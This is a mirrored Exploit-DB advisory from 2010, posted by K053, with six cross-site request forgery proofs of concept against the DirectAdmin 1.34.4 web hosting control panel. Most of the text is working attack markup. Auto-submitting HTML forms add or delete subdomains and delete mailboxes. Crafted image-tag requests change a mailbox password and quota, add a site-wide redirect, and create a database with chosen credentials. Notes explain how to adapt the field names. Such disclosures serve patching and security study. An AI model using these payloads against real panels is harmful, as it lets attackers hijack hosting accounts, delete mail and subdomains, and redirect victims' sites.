DirectAdmin 1.34.4 – Multiple Cross-Site Request Forgerys

• Exploit Database
• 148 阅读

• 作者： K053
  日期： 2010-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11813/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77

  ============================================================================= # Title : Multi CSRF vulnerability in DirectAdmin (1.34.4) # Date : 20-3-2010 # Version : 1.34.4 # Author : K053 [K053.Dev0te3 _AT_ gmail] # Tested on : Ubuntu # Vendor : http://www.directadmin.com/ # Download : http://www.directadmin.com/demo.html ============================================================================= # info : DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. ----------------------------------------------------------------------------- >> Here I have listed some poc , maybe you find more ;) ----------------------------------------------------------------------------- # poc 1: Add Subdomain | ------------------------- <html> <title>Add subdomain</title> <form name="info" action="http://address:port/CMD_SUBDOMAIN" method="post"> <input type=hidden name=domain value="domain_name"> <input type=hidden name=action value="create"> <input type=hidden name=subdomain value="test"> <input type="hidden" value="Submit"> <body onload="document.forms.info.submit();"> </html> ----------------------------------------------------------------------------- # poc 2 : Delete Subdomain | --------------------------- <html> <title>Delete subdomain</title> <form name="del" action="http://address:port/CMD_SUBDOMAIN" method="post"> <input type=hidden name=domain value="domain_name"> <input type=hidden name=action value="delete"> <input type=hidden name=contents value="yes"> <input type=hidden name=[selectX] value="subdomain_name"> <input type="hidden" value="Submit"> <body onload="document.forms.del.submit();"> </html>   Note : You msut set proper name stead selectx, for example if test subdomain is at number 2 in list, should set it select1. ----------------------------------------------------------------------------- # poc 3 : Delete Email| --------------------------- <html> <title>Delete Email</title> <form name="del" action="http://address:port/CMD_EMAIL_POP" method="post"> <input type=hidden name=domain value="domain_name"> <input type=hidden name=action value="delete"> <input type=hidden name=selectx value="put_mail"> <input type="hidden" value="Submit"> <body onload="document.forms.del.submit();"> </html> Note : You msut set proper name stead selectx, for example if test Mail is at number 2 in list, should set it select1. ----------------------------------------------------------------------------- # poc 4 : Change Email Configuration | ----------------------------------- <img src=http://address:port/CMD_EMAIL_POP?action=modify&domain=domain_name&user =username&newuser=username&passwd=mypasswd&passwd2=mypasswd&quota=0&update=Modify>   Note : Able to Cahnge quota, password & Name ----------------------------------------------------------------------------- # poc 5 : Set Redirection| ---------------------------- <img src=http://address:port/CMD_REDIRECT?domain=domain_name&action=add &from=%2F&type=301&to=http://google.com   Note : Change from value if you want set redirection for specific direction. ----------------------------------------------------------------------------- # poc 6 : Add Database | -------------------------- <img src=http://address:port/CMD_DB?action=create&domain=domain_name&name=b0f &user=b0f&passwd=frenzy&passwd2=frenzy&create=Create> -----------------------------------------------------------------------------